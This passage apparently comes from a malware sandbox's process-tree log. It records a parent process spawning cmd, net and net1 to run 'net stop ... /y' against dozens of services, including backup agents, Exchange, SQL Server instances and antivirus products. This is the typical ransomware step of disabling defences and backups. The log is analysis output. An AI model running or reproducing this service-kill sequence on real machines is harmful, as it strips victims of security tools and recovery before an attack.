  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      4⤵
      PID:676
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop BackupExecAgentAccelerator /y
  2⤵
  PID:332
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecAgentAccelerator /y
    3⤵
    PID:1868
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:1880
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop BackupExecAgentBrowser /y
  2⤵
  PID:1824
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecAgentBrowser /y
    3⤵
    PID:1912
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:1896
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop BackupExecDeviceMediaService /y
  2⤵
  PID:1780
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecDeviceMediaService /y
    3⤵
    PID:1980
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
      4⤵
      PID:1964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop BackupExecJobEngine /y
  2⤵
  PID:1976
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecJobEngine /y
    3⤵
    PID:1148
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:1832
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop BackupExecManagementService /y
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecManagementService /y
    3⤵
    PID:1848
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:1628
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop BackupExecRPCService /y
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecRPCService /y
    3⤵
    PID:1592
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:436
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop BackupExecVSSProvider /y
  2⤵
  PID:1088
- - C:\Windows\SysWOW64\net.exe
    net stop BackupExecVSSProvider /y
    3⤵
    PID:1752
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:1564
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop bedbg /y
  2⤵
  PID:2028
- - C:\Windows\SysWOW64\net.exe
    net stop bedbg /y
    3⤵
    PID:2024
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop bedbg /y
      4⤵
      PID:1032
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop DCAgent /y
  2⤵
  PID:1280
- - C:\Windows\SysWOW64\net.exe
    net stop DCAgent /y
    3⤵
    PID:620
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop DCAgent /y
      4⤵
      PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop EPSecurityService /y
  2⤵
  PID:1488
- - C:\Windows\SysWOW64\net.exe
    net stop EPSecurityService /y
    3⤵
    PID:1272
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EPSecurityService /y
      4⤵
      PID:112
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop EPUpdateService /y
  2⤵
  PID:1504
- - C:\Windows\SysWOW64\net.exe
    net stop EPUpdateService /y
    3⤵
    PID:1448
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EPUpdateService /y
      4⤵
      PID:1440
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop EraserSvc11710 /y
  2⤵
  PID:1648
- - C:\Windows\SysWOW64\net.exe
    net stop EraserSvc11710 /y
    3⤵
    PID:1516
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EraserSvc11710 /y
      4⤵
      PID:1052
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop EsgShKernel /y
  2⤵
  PID:1120
- - C:\Windows\SysWOW64\net.exe
    net stop EsgShKernel /y
    3⤵
    PID:1768
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop EsgShKernel /y
      4⤵
      PID:1076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop FA_Scheduler /y
  2⤵
  PID:1864
- - C:\Windows\SysWOW64\net.exe
    net stop FA_Scheduler /y
    3⤵
    PID:464
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop FA_Scheduler /y
      4⤵
      PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop IISAdmin /y
  2⤵
  PID:1892
- - C:\Windows\SysWOW64\net.exe
    net stop IISAdmin /y
    3⤵
    PID:1920
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IISAdmin /y
      4⤵
      PID:1872
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop IMAP4Svc /y
  2⤵
  PID:1824
- - C:\Windows\SysWOW64\net.exe
    net stop IMAP4Svc /y
    3⤵
    PID:1952
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop IMAP4Svc /y
      4⤵
      PID:1928
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop McShield /y
  2⤵
  PID:1792
- - C:\Windows\SysWOW64\net.exe
    net stop McShield /y
    3⤵
    PID:1908
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McShield /y
      4⤵
      PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop McTaskManager /y
  2⤵
  PID:1976
- - C:\Windows\SysWOW64\net.exe
    net stop McTaskManager /y
    3⤵
    PID:1664
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop McTaskManager /y
      4⤵
      PID:268
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop mfemms /y
  2⤵
  PID:2000
- - C:\Windows\SysWOW64\net.exe
    net stop mfemms /y
    3⤵
    PID:2032
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mfemms /y
      4⤵
      PID:1760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop mfevtp /y
  2⤵
  PID:1624
- - C:\Windows\SysWOW64\net.exe
    net stop mfevtp /y
    3⤵
    PID:2016
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mfevtp /y
      4⤵
      PID:1028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MMS /y
  2⤵
  PID:1088
- - C:\Windows\SysWOW64\net.exe
    net stop MMS /y
    3⤵
    PID:2008
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MMS /y
      4⤵
      PID:1156
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop mozyprobackup /y
  2⤵
  PID:2028
- - C:\Windows\SysWOW64\net.exe
    net stop mozyprobackup /y
    3⤵
    PID:1172
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop mozyprobackup /y
      4⤵
      PID:520
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MsDtsServer /y
  2⤵
  PID:2012
- - C:\Windows\SysWOW64\net.exe
    net stop MsDtsServer /y
    3⤵
    PID:1576
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer /y
      4⤵
      PID:1608
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MsDtsServer100 /y
  2⤵
  PID:1488
- - C:\Windows\SysWOW64\net.exe
    net stop MsDtsServer100 /y
    3⤵
    PID:1528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer100 /y
      4⤵
      PID:1440
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MsDtsServer110 /y
  2⤵
  PID:1484
- - C:\Windows\SysWOW64\net.exe
    net stop MsDtsServer110 /y
    3⤵
    PID:324
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer110 /y
      4⤵
      PID:1052
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSExchangeES /y
  2⤵
  PID:1520
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeES /y
    3⤵
    PID:1056
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeES /y
      4⤵
      PID:1076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSExchangeIS /y
  2⤵
  PID:1420
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeIS /y
    3⤵
    PID:1796
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeIS /y
      4⤵
      PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSExchangeMGMT /y
  2⤵
  PID:1868
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeMGMT /y
    3⤵
    PID:1896
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:1872
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSExchangeMTA /y
  2⤵
  PID:1924
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeMTA /y
    3⤵
    PID:1964
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMTA /y
      4⤵
      PID:1928
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSExchangeSA /y
  2⤵
  PID:1876
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeSA /y
    3⤵
    PID:1832
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA /y
      4⤵
      PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSExchangeSRS /y
  2⤵
  PID:1884
- - C:\Windows\SysWOW64\net.exe
    net stop MSExchangeSRS /y
    3⤵
    PID:1628
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSRS /y
      4⤵
      PID:268
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSOLAP$SQL_2008 /y
  2⤵
  PID:1656
- - C:\Windows\SysWOW64\net.exe
    net stop MSOLAP$SQL_2008 /y
    3⤵
    PID:436
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
      4⤵
      PID:1760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSOLAP$SYSTEM_BGC /y
  2⤵
  PID:1984
- - C:\Windows\SysWOW64\net.exe
    net stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:1564
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
      4⤵
      PID:1028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSOLAP$TPS /y
  2⤵
  PID:2016
- - C:\Windows\SysWOW64\net.exe
    net stop MSOLAP$TPS /y
    3⤵
    PID:1632
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPS /y
      4⤵
      PID:1368
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSOLAP$TPSAMA /y
  2⤵
  PID:1156
- - C:\Windows\SysWOW64\net.exe
    net stop MSOLAP$TPSAMA /y
    3⤵
    PID:1088
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
      4⤵
      PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$BKUPEXEC /y
  2⤵
  PID:520
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$BKUPEXEC /y
    3⤵
    PID:2028
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
      4⤵
      PID:112
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$ECWDB2 /y
  2⤵
  PID:1608
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$ECWDB2 /y
    3⤵
    PID:528
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
      4⤵
      PID:276
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$PRACTICEMGT /y
  2⤵
  PID:1440
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:1488
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:1540
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$PRACTTICEBGC /y
  2⤵
  PID:1052
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:1500
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:1856
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y
  2⤵
  PID:1076
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:1648
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:1384
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$SBSMONITORING /y
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SBSMONITORING /y
    3⤵
    PID:1420
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
      4⤵
      PID:1912
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$SHAREPOINT /y
  2⤵
  PID:1872
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SHAREPOINT /y
    3⤵
    PID:1868
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
      4⤵
      PID:1980
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$SQL_2008 /y
  2⤵
  PID:1928
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SQL_2008 /y
    3⤵
    PID:1892
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
      4⤵
      PID:1148
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$SYSTEM_BGC /y
  2⤵
  PID:1840
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:1876
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
      4⤵
      PID:1848
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$TPS /y
  2⤵
  PID:268
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$TPS /y
    3⤵
    PID:1888
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPS /y
      4⤵
      PID:1592
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$TPSAMA /y
  2⤵
  PID:1760
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$TPSAMA /y
    3⤵
    PID:1976
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
      4⤵
      PID:1752
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y
  2⤵
  PID:1028
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:2004
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
      4⤵
      PID:1372
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQL$VEEAMSQL2012 /y
  2⤵
  PID:1368
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:2020
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
      4⤵
      PID:876
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher /y
  2⤵
  PID:1604
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher /y
    3⤵
    PID:828
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher /y
      4⤵
      PID:884
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
  2⤵
  PID:112
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:520
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
      4⤵
      PID:556
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y
  2⤵
  PID:276
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:1608
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
      4⤵
      PID:664
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y
  2⤵
  PID:1540
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:1440
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
      4⤵
      PID:1788
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y
  2⤵
  PID:1856
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$SQL_2008 /y
    3⤵
    PID:1504
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
      4⤵
      PID:1860
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y
  2⤵
  PID:1384
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:1116
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
      4⤵
      PID:1380
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher$TPS /y
  2⤵
  PID:1912
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:1772
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
      4⤵
      PID:1900
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y
  2⤵
  PID:1980
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:1416
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
      4⤵
      PID:1780
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLSERVER /y
  2⤵
  PID:1148
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLSERVER /y
    3⤵
    PID:1928
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLSERVER /y
      4⤵
      PID:1904
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLServerADHelper100 /y
  2⤵
  PID:1848
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerADHelper100 /y
    3⤵
    PID:1304
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
      4⤵
      PID:1960
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MSSQLServerOLAPService /y
  2⤵
  PID:1592
- - C:\Windows\SysWOW64\net.exe
    net stop MSSQLServerOLAPService /y
    3⤵
    PID:1792
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
      4⤵
      PID:1852
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop MySQL57 /y
  2⤵
  PID:1752
- - C:\Windows\SysWOW64\net.exe
    net stop MySQL57 /y
    3⤵
    PID:1944
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop MySQL57 /y
      4⤵
      PID:1660
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ntrtscan /y
  2⤵
  PID:1372
- - C:\Windows\SysWOW64\net.exe
    net stop ntrtscan /y
    3⤵
    PID:2000
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ntrtscan /y
      4⤵
      PID:1640
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop OracleClientCache80 /y
  2⤵
  PID:876
- - C:\Windows\SysWOW64\net.exe
    net stop OracleClientCache80 /y
    3⤵
    PID:1368
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop OracleClientCache80 /y
      4⤵
      PID:1128
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop PDVFSService /y
  2⤵
  PID:884
- - C:\Windows\SysWOW64\net.exe
    net stop PDVFSService /y
    3⤵
    PID:1264
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop PDVFSService /y
      4⤵
      PID:2012
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop POP3Svc /y
  2⤵
  PID:580
- - C:\Windows\SysWOW64\net.exe
    net stop POP3Svc /y
    3⤵
    PID:1280
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop POP3Svc /y
      4⤵
      PID:1364
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ReportServer /y
  2⤵
  PID:1572
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer /y
    3⤵
    PID:1496
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer /y
      4⤵
      PID:1048
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ReportServer$SQL_2008 /y
  2⤵
  PID:1060
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$SQL_2008 /y
    3⤵
    PID:892
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:1052
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ReportServer$SYSTEM_BGC /y
  2⤵
  PID:332
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:1068
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
      4⤵
      PID:1076
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ReportServer$TPS /y
  2⤵
  PID:1916
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$TPS /y
    3⤵
    PID:1072
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPS /y
      4⤵
      PID:1804
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ReportServer$TPSAMA /y
  2⤵
  PID:1968
- - C:\Windows\SysWOW64\net.exe
    net stop ReportServer$TPSAMA /y
    3⤵
    PID:676
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
      4⤵
      PID:1872
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop RESvc /y
  2⤵
  PID:1836
- - C:\Windows\SysWOW64\net.exe
    net stop RESvc /y
    3⤵
    PID:1864
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop RESvc /y
      4⤵
      PID:1956
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop sacsvr /y
  2⤵
  PID:1652
- - C:\Windows\SysWOW64\net.exe
    net stop sacsvr /y
    3⤵
    PID:1140
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop sacsvr /y
      4⤵
      PID:1840
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SamSs /y
  2⤵
  PID:1080
- - C:\Windows\SysWOW64\net.exe
    net stop SamSs /y
    3⤵
    PID:1824
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SamSs /y
      4⤵
      PID:268
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SAVAdminService /y
  2⤵
  PID:1044
- - C:\Windows\SysWOW64\net.exe
    net stop SAVAdminService /y
    3⤵
    PID:1764
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SAVAdminService /y
      4⤵
      PID:1760
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SAVService /y
  2⤵
  PID:1560
- - C:\Windows\SysWOW64\net.exe
    net stop SAVService /y
    3⤵
    PID:1644
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SAVService /y
      4⤵
      PID:1028
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SDRSVC /y
  2⤵
  PID:1360
- - C:\Windows\SysWOW64\net.exe
    net stop SDRSVC /y
    3⤵
    PID:1596
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SDRSVC /y
      4⤵
      PID:1032
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SepMasterService /y
  2⤵
  PID:836
- - C:\Windows\SysWOW64\net.exe
    net stop SepMasterService /y
    3⤵
    PID:1600
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SepMasterService /y
      4⤵
      PID:1604
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop ShMonitor /y
  2⤵
  PID:560
- - C:\Windows\SysWOW64\net.exe
    net stop ShMonitor /y
    3⤵
    PID:1688
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop ShMonitor /y
      4⤵
      PID:1132
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop Smcinst /y
  2⤵
  PID:1580
- - C:\Windows\SysWOW64\net.exe
    net stop Smcinst /y
    3⤵
    PID:520
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop Smcinst /y
      4⤵
      PID:1488
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SmcService /y
  2⤵
  PID:1048
- - C:\Windows\SysWOW64\net.exe
    net stop SmcService /y
    3⤵
    PID:1572
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SmcService /y
      4⤵
      PID:1500
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SMTPSvc /y
  2⤵
  PID:1052
- - C:\Windows\SysWOW64\net.exe
    net stop SMTPSvc /y
    3⤵
    PID:1440
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SMTPSvc /y
      4⤵
      PID:1648
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$BKUPEXEC /y
  2⤵
  PID:1076
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:1504
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
      4⤵
      PID:1420
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$ECWDB2 /y
  2⤵
  PID:1804
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$ECWDB2 /y
    3⤵
    PID:1916
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
      4⤵
      PID:1868
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$PRACTTICEBGC /y
  2⤵
  PID:1872
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:1968
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
      4⤵
      PID:1892
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$PRACTTICEMGT /y
  2⤵
  PID:1956
- - C:\Windows\SysWOW64\net.exe
    net stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:1836
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
      4⤵
      PID:1876
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y
  2⤵
  PID:1840
